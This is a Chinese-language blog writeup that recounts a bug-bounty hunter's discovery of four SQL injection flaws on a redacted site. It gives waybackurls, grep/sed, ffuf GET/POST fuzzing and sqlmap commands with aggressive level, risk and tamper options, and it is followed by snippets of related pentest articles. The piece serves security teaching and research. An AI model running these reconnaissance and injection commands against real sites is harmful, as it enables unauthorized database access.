如何利用FFUF和Sqlmap发现多处SQL注入漏洞

VSole2021-12-24 08:52:04

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

背景介绍:

今天的故事来自一位叫Mahmoud Youssef的白帽子,他的职业是一名网络安全研究员,同时也是一名漏洞赏金猎人。为了安全起见,目标网站统一使用redacted.org进行了替代。

枚举阶段:

首先使用waybackurls工具对目标网站的Web页面进行归档,通过这些页面发现了不少节点,而这些页面中也夹杂了许多PHP文件,也许这其中就会有sql注入,那么我们来对这些页面进行一下过滤:

waybackurls https://redacted.org/ | uro | grep “.php” > php-files.txt

OK,成功筛选出PHP文件,他们看起来大概是下面这样:

这些PHP文件名看起来很有趣,也许它们可以帮我找到一些参数,接下来让我们创建一个参数字典,以便后面使用:

获取参数:

首先,我们需要使用grep筛选出"get"字符串并删除"get"之前的内容,并使其唯一以避免重复:

$ cat php-files.txt| grep -i get | sed 's/.*.get//' | sort -u

很好!另外我们应该删除.php后缀来创建这个参数字典,所以只需要使用命令"cut -f1 -d"即可:

OK,基本差不多完成了,但是我们注意到所有的参数基本都由2个单词组成,我们并不知道它们中哪一个是参数,所以还要对它们进行一下拆分:

sed 's/[A-Z]\+/&/g'

很好!但此时白帽小哥认为大多数参数应该都是小写的,所以还要将大写的参数转换为小写才行,同时要保留大写和小写参数两个字典:

现在有了这两个参数列表,让我们使用FFUF进行Fuzz吧,先使用下面的命令对小写参数进行Fuzz:

ffuf -w lowercase-parameters.txt -u "https://redacted.org/searchProgressCommitment.php?FUZZ=5"

遗憾的是,一无所获。

在这之后白帽小哥很沮丧,但没多久他有了另一个想法,把请求方式改成POST会怎样呢?想到这儿,白帽小哥火速登录到它的VPS,说干就干!

ffuf -w lowercase-parameters.txt -X POST -d "FUZZ=5" -u "https://redacted.org/searchProgressCommitment.php"

Bingo!白帽小哥成功在commitment 和 id 两个参数中得到了想要的结果。

好的,接下来用Burp拦截请求,添加参数,并将其保存为txt文件,使用

sqlmap开扫:

sqlmap -r req3.txt -p commitment --force-ssl --level 5 --risk 3 --dbms=”MYSQL” --hostname --current-user --current-db --dbs --tamper=between --no-cast

第1处SQL注入漏洞

第2处SQL注入漏洞(ws_delComment.php,注入参数id

第3处SQL注入漏洞(getTargets.php,注入参数goal)

第4处SQL注入漏洞(mailing_lists.php,注入参数list)

利用这种办法,白帽小哥一共收获了4处SQL注入漏洞。

sql注入sqlmap
本作品采用《CC 协议》,转载必须注明作者和本文链接
01登录框存在sql注入:通过前期的信息搜集,发现站点使用thinkphp3.2版本的框架,在登录页面验证存
发现漏洞七月正值暑假,闲暇时光在百度上inurl一番,找到了一个古老的企业OA系统IP站点,没有域名,扫过一眼,.NET流行时代的普遍漏洞浮现在脑海里——SQL注入在用户名里输入admin’,不负期望地报了错很明显,前后端都没有对用户的输入进行过滤,直接将’带入了SQL语句进行。初步判断,此OA系统存在SQL注入漏洞。漏洞验证打开BurpSuite,设置好浏览器代理,抓下HTTP请求,一气呵成。
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27单引号尝试:存在sql注入sqlmap 走起!跑数据 格式有点问题。获取到管理员加密后的密码$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu使用john 来破解john pwd --wordlist=/usr/share/wordlist/rockyou.txt admin/snoopy 登录后台3x0:后台篇在后台查找一番发现 类似于模板的页面可以利用模板的信息在结合上面的端口信息没有ssh应该是从web端进入 webshell?就接着用了4x0:提权篇查看系统的内核版本启动kali上的apache,把exp上传到服务器把exp下载到靶机解压exp授权脚本使用exp报错不影响使用获取到root权限5x0:flag获得
记一次SQLmap实战
2021-09-28 07:41:13
简介:sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目
一些重要的SQLMap命令
2023-05-04 08:55:08
从扫描SQL注入漏洞到获取数据库名字、表和列,以及获得系统访问权限,其可被用于多种目的。我们必须给SQLMap提供有效的cookie才能对登录页面的POST请求进行扫描。不过别总是保持一个较高的值,因为可能会影响结果的准确性。默认情况下值为1,最高可以设置为3。值为3时,就是最大值,包含了一些严重的SQL查询。级别指定要执行的检查或payload的数量。
本靶机难度为高难度,涉及到了缓冲区溢出的源码审计 ,逆向分析,动态调试等漏洞技能点,攻击方法有2种:??SQL 注入得到的密码可以保留。
前段时间参加攻防演练的时候,发现目标系统有很多都使用了用友的产品,故整理一篇关于用友漏洞的文章。
burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}
vulnhub之Mercury的实践
2022-11-30 10:31:40
今天实践的是vulnhub的Mercury镜像,下载地址,https://download.vulnhub.
渗透测试很多时候需要的细心和耐心再加上一点运气
VSole
网络安全专家